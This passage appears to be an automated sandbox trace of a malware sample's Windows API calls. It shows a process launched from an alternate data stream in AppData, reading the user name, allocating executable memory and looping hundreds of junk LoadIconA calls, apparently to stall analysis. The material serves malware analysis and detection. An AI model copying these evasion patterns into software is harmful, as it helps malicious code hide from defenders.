hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b338 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709180 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3e0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b488 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709220 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7092c0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709360 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c930 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b530 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709400 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7094a0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c9c8 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709540 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ca78 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7095e0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709680 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709720 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7097c0 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b5d8 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709860 | out: hHeap=0x6d0000) returned 1 [0031.934] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b680 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b728 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cb40 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cbe0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b7d0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b878 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cc80 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fd88 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b920 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fe38 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cd20 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b9c8 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ba70 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cdc0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce60 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cf00 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bb18 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70eb28 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70cfa0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d040 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d0e0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d180 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d220 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bbc0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d2c0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d360 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d400 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d4a0 | out: hHeap=0x6d0000) returned 1 [0031.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d540 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bc68 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d5e0 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d680 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d720 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d7c0 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d860 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ff00 | out: hHeap=0x6d0000) returned 1 [0031.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ffa8 | out: hHeap=0x6d0000) returned 1 [0031.971] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0xffffffff) Thread: id = 37 os_tid = 0xb84 Process: id = "2" image_name = "arbiter:bin" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\arbiter:bin" page_root = "0x4ab3f000" os_pid = "0x6f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaa4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Arbiter:bin\" -r" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x358 [0032.027] LoadCursorW (hInstance=0x0, lpCursorName=0x257f) returned 0x0 [0032.027] GetUserNameA (in: lpBuffer=0x18ff18, pcbBuffer=0x18ff84 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18ff84) returned 1 [0032.142] GetEnhMetaFileA (lpName="u7968o987uyte444") returned 0x0 [0032.143] GetLastError () returned 0x2 [0032.143] LoadIconA (hInstance=0x0, lpIconName=0x7f04) returned 0x1002f [0032.143] DeleteMetaFile (hmf=0x1) returned 0 [0032.143] LoadLibraryA (lpLibFileName="advapi32") returned 0x77710000 [0032.143] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0032.143] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="InterfacE\\{b196b287-bab4-101a-b69c-00aa00341d07}", phkResult=0x50b818 | out: phkResult=0x50b818*=0x9a) returned 0x0 [0032.144] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0032.144] RegQueryValueExA (in: hKey=0x9a, lpValueName="", lpReserved=0x0, lpType=0x18febc, lpData=0x18fdf0, lpcbData=0x50b3e8*=0xc8 | out: lpType=0x18febc*=0x1, lpData="IEnumConnections", lpcbData=0x50b3e8*=0x11) returned 0x0 [0032.144] LoadLibraryA (lpLibFileName="kernel32") returned 0x76d30000 [0032.144] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0032.144] VirtualAlloc (lpAddress=0x0, dwSize=0xf000, flAllocationType=0x3000, flProtect=0x40) returned 0x1a0000 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x24a7) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.145] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.146] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.147] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.148] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.149] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.150] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.151] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.152] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.153] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.154] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.155] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.156] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0032.157] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 